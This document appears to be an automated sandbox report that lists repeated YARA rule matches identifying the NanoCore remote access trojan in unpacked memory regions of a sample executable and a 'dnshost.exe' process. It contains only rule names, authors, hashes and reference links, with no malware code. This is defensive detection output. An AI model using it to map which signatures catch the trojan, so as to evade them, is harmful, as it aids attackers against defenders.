Source: 5.2.nD2ozRD7MN.exe.7930000.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7930000.28.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7904c9f.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.nD2ozRD7MN.exe.7904c9f.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7904c9f.25.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.78a0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7900000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7900000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7900000.27.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7860000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7860000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7860000.18.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.nD2ozRD7MN.exe.4075ad0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7890000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7890000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7890000.21.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.nD2ozRD7MN.exe.3c8061c.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.473fe5e.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.3441e00.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.45e9ad7.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.45e9ad7.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.45e9ad7.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.78c0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.nD2ozRD7MN.exe.2c9a258.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.nD2ozRD7MN.exe.2c9a258.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.nD2ozRD7MN.exe.2c9a258.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.76d0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7880000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7880000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7880000.20.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.nD2ozRD7MN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7850000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7850000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7850000.17.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.474e28e.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.2.dnshost.exe.2dfa2d4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.2.dnshost.exe.2dfa2d4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.dnshost.exe.2dfa2d4.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.7930000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.7930000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.7930000.28.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.45e4e38.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.nD2ozRD7MN.exe.3435bc4.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
